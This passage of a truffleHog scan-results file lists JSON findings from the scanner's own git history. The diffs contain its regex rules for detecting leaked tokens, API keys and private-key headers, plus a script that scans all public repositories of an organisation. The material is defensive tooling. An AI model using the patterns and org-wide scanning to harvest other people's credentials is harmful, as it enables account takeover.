\"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN DSA PRIVATE KEY-----\u001b[0m", "reason": "SSH (DSA) private key", "stringsFound": ["-----BEGIN DSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "modifying search org\n", "commitHash": "3048c6429d80094b42fd44919e3d6768536178ce", "date": "2018-09-29 18:21:15", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "modifying search org\n", "commitHash": "3048c6429d80094b42fd44919e3d6768536178ce", "date": "2018-09-29 18:21:15", "diff": "@@ -4,32 +4,6 @@ via https://github.com/dxa4481/truffleHog/pull/9\n \"\"\"\n import requests\n from truffleHog import truffleHog\n-import re\n-from json import loads, dumps\n-\n-rules = {\n- \"Slack Token\": \"(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})\",\n- \"RSA private key\": \"-----BEGIN RSA PRIVATE KEY-----\",\n- \"SSH (OPENSSH) private key\": \"-----BEGIN OPENSSH PRIVATE KEY-----\",\n- \"SSH (DSA) private key\": \"-----BEGIN DSA PRIVATE KEY-----\",\n- \"SSH (EC) private key\": \"-----BEGIN EC PRIVATE KEY-----\",\n- \"PGP private key block\": \"-----BEGIN PGP PRIVATE KEY BLOCK-----\",\n- \"Facebook Oauth\": \"[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\\\"\\\\s][0-9a-f]{32}['\\\"\\\\s]\",\n- \"Twitter Oauth\": \"[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,44}['\\\"\\\\s]\",\n- \"GitHub\": \"[g|G][i|I][t|T][h|H][u|U][b|B].{0,30}['\\\"\\\\s][0-9a-zA-Z]{35,40}['\\\"\\\\s]\",\n- \"Google Oauth\": \"(\\\"client_secret\\\":\\\"[a-zA-Z0-9-_]{24}\\\")\",\n- \"AWS API Key\": \"AKIA[0-9A-Z]{16}\",\n- \"Heroku API Key\": \"[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}\",\n- \"Generic Secret\": \"[s|S][e|E][c|C][r|R][e|E][t|T].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Generic API Key\": \"[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].{0,30}['\\\"\\\\s][0-9a-zA-Z]{32,45}['\\\"\\\\s]\",\n- \"Slack Webhook\": \"https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}\",\n- \"Google (GCP) Service-account\": \"\\\"type\\\": \\\"service_account\\\"\",\n- \"Twilio API Key\": \"SK[a-z0-9]{32}\",\n- \"Password in URL\": \"[a-zA-Z]{3,10}://[^/\\\\s:@]{3,20}:[^/\\\\s:@]{3,20}@.{1,100}[\\\"'\\\\s]\",\n-}\n-\n-for key in rules:\n- rules[key] = re.compile(rules[key])\n \n def get_org_repos(orgname, page):\n response = requests.get(url='https://api.github.com/users/' + orgname + '/repos?page={}'.format(page))\n@@ -37,16 +11,8 @@ def get_org_repos(orgname, page):\n if not json:\n return None\n for item in json:\n-\n- if item['fork'] == False and reached:\n+ if item['private'] == False:\n print('searching ' + item[\"html_url\"])\n- results = truffleHog.find_strings(item[\"html_url\"], do_regex=True, custom_regexes=rules, do_entropy=False, max_depth=100000)\n- for issue in results[\"foundIssues\"]:\n- d = loads(open(issue).read())\n- d['github_url'] = \"{}/blob/{}/{}\".format(item[\"html_url\"], d['commitHash'], d['path'])\n- d['github_commit_url'] = \"{}/commit/{}\".format(item[\"html_url\"], d['commitHash'])\n- d['diff'] = d['diff'][0:200]\n- d['printDiff'] = d['printDiff'][0:200]\n- print(dumps(d, indent=4))\n+ truffleHog.find_strings(item[\"html_url\"], do_regex=True, do_entropy=False, max_depth=100000)\n get_org_repos(orgname, page + 1)\n-get_org_repos(\"square\", 1)\n+get_org_repos(\"twitter\", 1)\n", "path": "scripts/searchOrg.py", "printDiff": "\u001b[93m-----BEGIN PGP PRIVATE KEY BLOCK-----\u001b[0m", "reason": "PGP private key block", "stringsFound": ["-----BEGIN PGP PRIVATE KEY BLOCK-----"]} +{"branch": "origin/dev", "commit": "Update README.md", "commitHash": "fe0d53753c8df41e7aef6083684f0e4bc9e94016", "date": "2018-08-28 05:08:51", "diff": "@@ -1,11 +1,6 @@\n import unittest\n import os\n-import sys\n-import json\n-import io\n from truffleHog import truffleHog\n-from mock import patch \n-from mock import MagicMock\n \n \n class TestStringMethods(unittest.TestCase):\n@@ -27,44 +22,5 @@ class TestStringMethods(unittest.TestCase):\n except UnicodeEncodeError:\n self.fail(\"Unicode print error\")\n \n- def test_return_correct_commit_hash(self):\n- # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n- # is immediately followed by a secret inserting commit:\n- # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n- since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n- commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n- cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n-\n- json_result = ''\n- if sys.version_info >= (3,):\n- tmp_stdout = io.StringIO()\n- else:\n- tmp_stdout = io.BytesIO()\n- bak_stdout = sys.stdout\n-\n- # Redirect STDOUT, run scan and re-establish STDOUT\n- sys.stdout = tmp_stdout\n- try:\n- truffleHog.find_strings(\"https://github.com/dxa4481/truffleHog.git\", \n- since_commit=since_commit, printJson=True, surpress_output=False)\n- finally:\n- sys.stdout = bak_stdout\n-\n- json_result_list = tmp_stdout.getvalue().split('\\n')\n- results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n- filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n- self.assertEqual(1, len(filtered_results))\n- self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n- # Additionally, we cross-validate the commit comment matches the expected comment\n- self.assertEqual(cross_valdiating_commit_w_secret_comment, filtered_results[0]['commit'].strip())\n-\n- @patch('truffleHog.truffleHog.clone_git_repo')\n- @patch('truffleHog.truffleHog.Repo')\n- def test_branch(self, repo_const_mock, clone_git_repo): \n- repo = MagicMock()\n- repo_const_mock.return_value = repo\n- truffleHog.find_strings(\"test_repo\", branch=\"testbranch\")\n- repo.remotes.origin.fetch.assert_called_once_with(\"testbranch\")\n-\n if __name__ == '__main__':\n unittest.main()\n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "Merge pull request #114 from jwilk-forks/spelling\n\nFix typos", "commitHash": "d768edc419bda068aaf50406dc35ed8ffa3b25c6", "date": "2018-08-25 05:33:23", "diff": "@@ -1,6 +1,11 @@\n import unittest\n import os\n+import sys\n+import json\n+import io\n from truffleHog import truffleHog\n+from mock import patch \n+from mock import MagicMock\n \n \n class TestStringMethods(unittest.TestCase):\n@@ -22,5 +27,44 @@ class TestStringMethods(unittest.TestCase):\n except UnicodeEncodeError:\n self.fail(\"Unicode print error\")\n \n+ def test_return_correct_commit_hash(self):\n+ # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n+ # is immediately followed by a secret inserting commit:\n+ # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n+ since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n+ commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n+ cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n+\n+ json_result = ''\n+ if sys.version_info >= (3,):\n+ tmp_stdout = io.StringIO()\n+ else:\n+ tmp_stdout = io.BytesIO()\n+ bak_stdout = sys.stdout\n+\n+ # Redirect STDOUT, run scan and re-establish STDOUT\n+ sys.stdout = tmp_stdout\n+ try:\n+ truffleHog.find_strings(\"https://github.com/dxa4481/truffleHog.git\", \n+ since_commit=since_commit, printJson=True, surpress_output=False)\n+ finally:\n+ sys.stdout = bak_stdout\n+\n+ json_result_list = tmp_stdout.getvalue().split('\\n')\n+ results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n+ filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n+ self.assertEqual(1, len(filtered_results))\n+ self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n+ # Additionally, we cross-validate the commit comment matches the expected comment\n+ self.assertEqual(cross_valdiating_commit_w_secret_comment, filtered_results[0]['commit'].strip())\n+\n+ @patch('truffleHog.truffleHog.clone_git_repo')\n+ @patch('truffleHog.truffleHog.Repo')\n+ def test_branch(self, repo_const_mock, clone_git_repo): \n+ repo = MagicMock()\n+ repo_const_mock.return_value = repo\n+ truffleHog.find_strings(\"test_repo\", branch=\"testbranch\")\n+ repo.remotes.origin.fetch.assert_called_once_with(\"testbranch\")\n+\n if __name__ == '__main__':\n unittest.main()\n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "Merge branch 'dev' into bugfix/wrong-commit-hash", "commitHash": "2e064ae3275a44f9b382c3d0cb5fedff72105942", "date": "2018-08-25 05:32:36", "diff": "@@ -1,8 +1,5 @@\n import unittest\n import os\n-import sys\n-import json\n-import io\n from truffleHog import truffleHog\n from mock import patch \n from mock import MagicMock\n@@ -27,37 +24,6 @@ class TestStringMethods(unittest.TestCase):\n except UnicodeEncodeError:\n self.fail(\"Unicode print error\")\n \n- def test_return_correct_commit_hash(self):\n- # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n- # is immediately followed by a secret inserting commit:\n- # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n- since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n- commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n- cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n-\n- json_result = ''\n- if sys.version_info >= (3,):\n- tmp_stdout = io.StringIO()\n- else:\n- tmp_stdout = io.BytesIO()\n- bak_stdout = sys.stdout\n-\n- # Redirect STDOUT, run scan and re-establish STDOUT\n- sys.stdout = tmp_stdout\n- try:\n- truffleHog.find_strings(\"https://github.com/dxa4481/truffleHog.git\", \n- since_commit=since_commit, printJson=True, surpress_output=False)\n- finally:\n- sys.stdout = bak_stdout\n-\n- json_result_list = tmp_stdout.getvalue().split('\\n')\n- results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n- filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n- self.assertEqual(1, len(filtered_results))\n- self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n- # Additionally, we cross-validate the commit comment matches the expected comment\n- self.assertEqual(cross_valdiating_commit_w_secret_comment, filtered_results[0]['commit'].strip())\n-\n @patch('truffleHog.truffleHog.clone_git_repo')\n @patch('truffleHog.truffleHog.Repo')\n def test_branch(self, repo_const_mock, clone_git_repo): \n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "updating regexes\n", "commitHash": "37f962034a57768db3b581b6a2d969015d673a1b", "date": "2018-07-29 22:01:10", "diff": "@@ -1,5 +1,8 @@\n import unittest\n import os\n+import sys\n+import json\n+import io\n from truffleHog import truffleHog\n \n \n@@ -22,5 +25,37 @@ class TestStringMethods(unittest.TestCase):\n except UnicodeEncodeError:\n self.fail(\"Unicode print error\")\n \n+ def test_return_correct_commit_hash(self):\n+ # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n+ # is immediately followed by a secret inserting commit:\n+ # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n+ since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n+ commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n+ cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n+\n+ json_result = ''\n+ if sys.version_info >= (3,):\n+ tmp_stdout = io.StringIO()\n+ else:\n+ tmp_stdout = io.BytesIO()\n+ bak_stdout = sys.stdout\n+\n+ # Redirect STDOUT, run scan and re-establish STDOUT\n+ sys.stdout = tmp_stdout\n+ try:\n+ truffleHog.find_strings(\"https://github.com/dxa4481/truffleHog.git\", \n+ since_commit=since_commit, printJson=True, surpress_output=False)\n+ finally:\n+ sys.stdout = bak_stdout\n+\n+ json_result_list = tmp_stdout.getvalue().split('\\n')\n+ results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n+ filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n+ self.assertEqual(1, len(filtered_results))\n+ self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n+ # Additionally, we cross-validate the commit comment matches the expected comment\n+ self.assertEqual(cross_valdiating_commit_w_secret_comment, filtered_results[0]['commit'].strip())\n+\n+\n if __name__ == '__main__':\n unittest.main()\n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "Added a test case to ensure the correct commitHash is returned (includes a commit comment cross-validation)\n", "commitHash": "59b59ef81ce6efb9f96edce07cd3fc0e2f5e7003", "date": "2018-06-11 18:16:34", "diff": "@@ -1,8 +1,5 @@\n import unittest\n import os\n-import sys\n-import json\n-import io\n from truffleHog import truffleHog\n \n \n@@ -25,34 +22,5 @@ class TestStringMethods(unittest.TestCase):\n except UnicodeEncodeError:\n self.fail(\"Unicode print error\")\n \n- def test_return_correct_commit_hash(self):\n- # Start at commit d15627104d07846ac2914a976e8e347a663bbd9b, which \n- # is immediately followed by a secret inserting commit:\n- # https://github.com/dxa4481/truffleHog/commit/9ed54617547cfca783e0f81f8dc5c927e3d1e345\n- since_commit = 'd15627104d07846ac2914a976e8e347a663bbd9b'\n- commit_w_secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\n- cross_valdiating_commit_w_secret_comment = 'OH no a secret'\n-\n- json_result = ''\n- tmp_stdout = io.StringIO()\n- bak_stdout = sys.stdout\n-\n- # Redirect STDOUT, run scan and re-establish STDOUT\n- sys.stdout = tmp_stdout\n- try:\n- truffleHog.find_strings(\"https://github.com/dxa4481/truffleHog.git\", \n- since_commit=since_commit, printJson=True, surpress_output=False)\n- finally:\n- sys.stdout = bak_stdout\n-\n- json_result_list = tmp_stdout.getvalue().split('\\n')\n- results = [json.loads(r) for r in json_result_list if bool(r.strip())]\n- filtered_results = list(filter(lambda r: r['commitHash'] == commit_w_secret, results))\n- self.assertEqual(1, len(filtered_results))\n- self.assertEqual(commit_w_secret, filtered_results[0]['commitHash'])\n- # Additionally, we cross-validate the commit comment matches the expected comment\n- self.assertEqual(cross_valdiating_commit_w_secret_comment, filtered_results[0]['commit'].strip())\n-\n-\n if __name__ == '__main__':\n unittest.main()\n", "path": "test_all.py", "printDiff": "\u001b[93msecret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'\u001b[0m", "reason": "Generic Secret", "stringsFound": ["secret = '9ed54617547cfca783e0f81f8dc5c927e3d1e345'"]} +{"branch": "origin/dev", "commit": "Merge branch 'dev' of github.com:dxa4481/truffleHog into dev\n", "commitHash": "1e1974b2eb888cdf876623973301e2e1a0faf8cc", "date": "2018-05-13 19:52:22", "diff": "@@ -26,29 +26,20 @@ pip install truffleHog\n \n ## Customizing\n \n-Custom regexes can be added with the following flag `--rules /path/to/rules`. This should be a json file of the following format:\n+Custom regexes can be added to the following file:\n ```\n-{\n- \"RSA private key\": \"-----BEGIN EC PRIVATE KEY-----\"\n-}\n+truffleHog/truffleHog/regexChecks.py\n ```\n Things like subdomain enumeration, s3 bucket detection, and other useful regexes highly custom to the situation can be added.\n \n Feel free to also contribute high signal regexes upstream that you think will benifit the community. Things like Azure keys, Twilio keys, Google Compute keys, are welcome, provided a high signal regex can be constructed.\n \n-Trufflehog's base rule set sources from https://github.com/dxa4481/truffleHogRegexes/blob/master/truffleHogRegexes/regexes.json\n-\n ## How it works\n This module will go through the entire commit history of each branch, and check each diff from each commit, and check for secrets. This is both by regex and by entropy. For entropy checks, trufflehog will evaluate the shannon entropy for both the base64 char set and hexidecimal char set for every blob of text greater than 20 characters comprised of those character sets in each diff. If at any point a high entropy string >20 characters is detected, it will print to the screen.\n \n ## Help\n \n ```\n-usage: trufflehog [-h] [--json] [--regex] [--rules RULES]\n- [--entropy DO_ENTROPY] [--since_commit SINCE_COMMIT]\n- [--max_depth MAX_DEPTH]\n- git_url\n-\n Find secrets hidden in the depths of git.\n \n positional arguments:\n@@ -58,7 +49,6 @@ optional arguments:\n -h, --help show this help message and exit\n --json Output in JSON\n --regex Enable high signal regex checks\n- --rules RULES Ignore default regexes and source from json list file\n --entropy DO_ENTROPY Enable entropy checks\n --since_commit SINCE_COMMIT\n Only scan from a given commit hash\n", "path": "README.md", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "surpressing output\n", "commitHash": "09824b0c9f512c548a3de1d564453e092d5d7077", "date": "2018-05-13 19:52:07", "diff": "@@ -26,20 +26,29 @@ pip install truffleHog\n \n ## Customizing\n \n-Custom regexes can be added to the following file:\n+Custom regexes can be added with the following flag `--rules /path/to/rules`. This should be a json file of the following format:\n ```\n-truffleHog/truffleHog/regexChecks.py\n+{\n+ \"RSA private key\": \"-----BEGIN EC PRIVATE KEY-----\"\n+}\n ```\n Things like subdomain enumeration, s3 bucket detection, and other useful regexes highly custom to the situation can be added.\n \n Feel free to also contribute high signal regexes upstream that you think will benifit the community. Things like Azure keys, Twilio keys, Google Compute keys, are welcome, provided a high signal regex can be constructed.\n \n+Trufflehog's base rule set sources from https://github.com/dxa4481/truffleHogRegexes/blob/master/truffleHogRegexes/regexes.json\n+\n ## How it works\n This module will go through the entire commit history of each branch, and check each diff from each commit, and check for secrets. This is both by regex and by entropy. For entropy checks, trufflehog will evaluate the shannon entropy for both the base64 char set and hexidecimal char set for every blob of text greater than 20 characters comprised of those character sets in each diff. If at any point a high entropy string >20 characters is detected, it will print to the screen.\n \n ## Help\n \n ```\n+usage: trufflehog [-h] [--json] [--regex] [--rules RULES]\n+ [--entropy DO_ENTROPY] [--since_commit SINCE_COMMIT]\n+ [--max_depth MAX_DEPTH]\n+ git_url\n+\n Find secrets hidden in the depths of git.\n \n positional arguments:\n@@ -49,6 +58,7 @@ optional arguments:\n -h, --help show this help message and exit\n --json Output in JSON\n --regex Enable high signal regex checks\n+ --rules RULES Ignore default regexes and source from json list file\n --entropy DO_ENTROPY Enable entropy checks\n --since_commit SINCE_COMMIT\n Only scan from a given commit hash\n", "path": "README.md", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Update README.md", "commitHash": "9def4f5eb76dc43c8d68b40940a473546b71c97a", "date": "2018-05-06 19:07:07", "diff": "@@ -26,29 +26,20 @@ pip install truffleHog\n \n ## Customizing\n \n-Custom regexes can be added with the following flag `--rules /path/to/rules`. This should be a json file of the following format:\n+Custom regexes can be added to the following file:\n ```\n-{\n- \"RSA private key\": \"-----BEGIN EC PRIVATE KEY-----\"\n-}\n+truffleHog/truffleHog/regexChecks.py\n ```\n Things like subdomain enumeration, s3 bucket detection, and other useful regexes highly custom to the situation can be added.\n \n Feel free to also contribute high signal regexes upstream that you think will benifit the community. Things like Azure keys, Twilio keys, Google Compute keys, are welcome, provided a high signal regex can be constructed.\n \n-Trufflehog's base rule set sources from https://github.com/dxa4481/truffleHogRegexes/blob/master/truffleHogRegexes/regexes.json\n-\n ## How it works\n This module will go through the entire commit history of each branch, and check each diff from each commit, and check for secrets. This is both by regex and by entropy. For entropy checks, trufflehog will evaluate the shannon entropy for both the base64 char set and hexidecimal char set for every blob of text greater than 20 characters comprised of those character sets in each diff. If at any point a high entropy string >20 characters is detected, it will print to the screen.\n \n ## Help\n \n ```\n-usage: trufflehog [-h] [--json] [--regex] [--rules RULES]\n- [--entropy DO_ENTROPY] [--since_commit SINCE_COMMIT]\n- [--max_depth MAX_DEPTH]\n- git_url\n-\n Find secrets hidden in the depths of git.\n \n positional arguments:\n@@ -58,7 +49,6 @@ optional arguments:\n -h, --help show this help message and exit\n --json Output in JSON\n --regex Enable high signal regex checks\n- --rules RULES Ignore default regexes and source from json list file\n --entropy DO_ENTROPY Enable entropy checks\n --since_commit SINCE_COMMIT\n Only scan from a given commit hash\n", "path": "README.md", "printDiff": "\u001b[93m-----BEGIN EC PRIVATE KEY-----\u001b[0m", "reason": "SSH (EC) private key", "stringsFound": ["-----BEGIN EC PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Changing regexes to install regex package\n", "commitHash": "58690fe2e89d0aef28ae313c8554941104071bb1", "date": "2018-04-14 19:26:10", "diff": "@@ -0,0 +1,19 @@\n+import re\n+\n+regexes = {\n+ #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n+ \"RSA private key\": re.compile('-----BEGIN RSA PRIVATE KEY-----'),\n+ \"SSH (OPENSSH) private key\": re.compile('-----BEGIN OPENSSH PRIVATE KEY-----'),\n+ \"SSH (DSA) private key\": re.compile('-----BEGIN DSA PRIVATE KEY-----'),\n+ \"SSH (EC) private key\": re.compile('-----BEGIN EC PRIVATE KEY-----'),\n+ \"PGP private key block\": re.compile('-----BEGIN PGP PRIVATE KEY BLOCK-----'),\n+ \"Facebook Oauth\": re.compile('[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].*[\\'|\"][0-9a-f]{32}[\\'|\"]'),\n+ \"Twitter Oauth\": re.compile('[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[\\'|\"][0-9a-zA-Z]{35,44}[\\'|\"]'),\n+ \"GitHub\": re.compile('[g|G][i|I][t|T][h|H][u|U][b|B].*[[\\'|\"]0-9a-zA-Z]{35,40}[\\'|\"]'),\n+ \"Google Oauth\": re.compile('(\"client_secret\":\"[a-zA-Z0-9-_]{24}\")'),\n+ \"AWS API Key\": re.compile('AKIA[0-9A-Z]{16}'),\n+ \"Heroku API Key\": re.compile('[h|H][e|E][r|R][o|O][k|K][u|U].*[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}'),\n+ \"Generic Secret\": re.compile('[s|S][e|E][c|C][r|R][e|E][t|T].*[\\'|\"][0-9a-zA-Z]{32,45}[\\'|\"]'),\n+}\n+\n", "path": "truffleHog/defaultRegexes/regexChecks.py", "printDiff": "\u001b[93m-----BEGIN RSA PRIVATE KEY-----\u001b[0m", "reason": "RSA private key", "stringsFound": ["-----BEGIN RSA PRIVATE KEY-----"]} +{"branch": "origin/dev", "commit": "Changing regexes to install regex package\n", "commitHash": "58690fe2e89d0aef28ae313c8554941104071bb1", "date": "2018-04-14 19:26:10", "diff": "@@ -0,0 +1,19 @@\n+import re\n+\n+regexes = {\n+ #\"Internal subdomain\": re.compile('([a-z0-9]+[.]*supersecretinternal[.]com)'),\n+ \"Slack Token\": re.compile('(xox[p|b|o|a]-[0-9]{12}-[0-9]{12}-[0-9]{12}-[a-z0-9]{32})'),\n+ \"RSA private key\": 